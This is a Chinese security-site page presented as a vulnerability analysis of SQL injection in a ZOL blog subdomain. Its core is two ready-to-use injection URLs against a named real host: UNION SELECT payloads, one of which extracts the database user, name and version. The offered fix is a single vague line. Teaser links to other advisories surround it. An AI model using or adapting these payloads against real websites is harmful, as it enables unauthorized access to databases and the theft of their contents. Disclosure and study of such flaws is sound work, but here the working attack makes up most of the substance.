首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络安全
漏洞分析
正文
中关村在线博客子站SQL注入及修复方案
所属分类:
网络安全
/
漏洞分析
阅读数: 1371
收藏 0
赞 0
分享
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
更多精彩内容
其他人还在看
AOL Radio MediaPlaybackControl 控件栈溢出漏洞
受影响系统: AOL AmpX.dll 2.6.1.11 不受影响系统: AOL AmpX.dll 2.6.2.6 描述: AOL的AmpX ActiveX控件是AOL Radio使用的用于播放网页中音频流的控件。 AmpX.dll所提供的
评论 0
收藏 0
赞 0
分享
2007年12月网络安全漏洞总结
声明:本十大安全漏洞由NSFOCUS安全小组根据安全漏洞的严重程度、影响范围等因素综合评出,仅供参考 1.2007-12-11 Microsoft消息队列服务栈溢出漏洞 综述: Microsoft Windows是微软发布的非常流行的操
评论 0
收藏 0
赞 0
分享
OmniPCX Enterprise存在远程命令注入漏洞
受影响系统: Alcatel-Lucent OmniPCX Enterprise <= 7.1 不受影响系统: Alcatel-Lucent OmniPCX Enterprise 7.1 patch F5.401.19 Alcatel-Luc
评论 0
收藏 0
赞 0
分享
Sun Java jpiexp32.dll对象名称含空指针引用漏洞
受影响系统: Sun JRE < 5.0 Update 14 不受影响系统: Sun JRE 5.0 Update 14 描述: Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。 JRE处理畸
评论 0
收藏 0
赞 0
分享
InterBase和Firebird远程栈缓冲区溢出漏洞
受影响系统: Borland InterBase WI-V8.1.0.257 Borland InterBase WI-V8.0.0.123 Borland InterBase WI-V7.5.1.80 Borland InterB
评论 0
收藏 0
赞 0
分享
IE 存在document.open()方式地址欺骗漏洞
受影响系统: Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft
评论 0
收藏 0
赞 0
分享
Microsoft IE onunload事件地址栏欺骗漏洞
受影响系统: Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Ex
评论 0
收藏 0
赞 0
分享
F2blog XMLRPC 上传任意文件漏洞
刚从官方下载的最新版:F2blog-v1.2_build_03.01_full 存在漏洞文件:xmlrpc.php, 影响:可上传任意文件到服务器。 原理:get_http_raw_post_data()是获取最原始的传递过来的数据,也是说不会因为PHP环境的ma
评论 0
收藏 0
赞 0
分享
FTP客户端目录遍历漏洞可向任意位置写文件
FFFTP是一款小型的FTP客户端软件。FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。 受影
评论 0
收藏 0
赞 0
分享
Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞
受影响系统: Adobe Photoshop Album Starter Edition 3.2 描述: ---------------------------------------------------------------------------
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
即使现在停产 微商面膜至少需需5年才能卖完
做什么样的网站能赚钱?
贴吧引流变现,高调创收!
什么样的网站赚钱 怎么赚钱?
未来5大网络销售模式选哪种好?
草根站长靠什么赚钱?什么样的人能成为赚钱的草根站长?
站长故事
更多
一个个人站长的网站推广运营核心销策略
我眼里的2014年中国互联网大会亮点
年轻站长的苦逼SEO路:虽难却依旧顽强的坚持着
从月薪3500到身价3千万
十年了!一个依靠设计师们热情支撑起的网站
浅谈新手站长在网站运营中如何去养站?
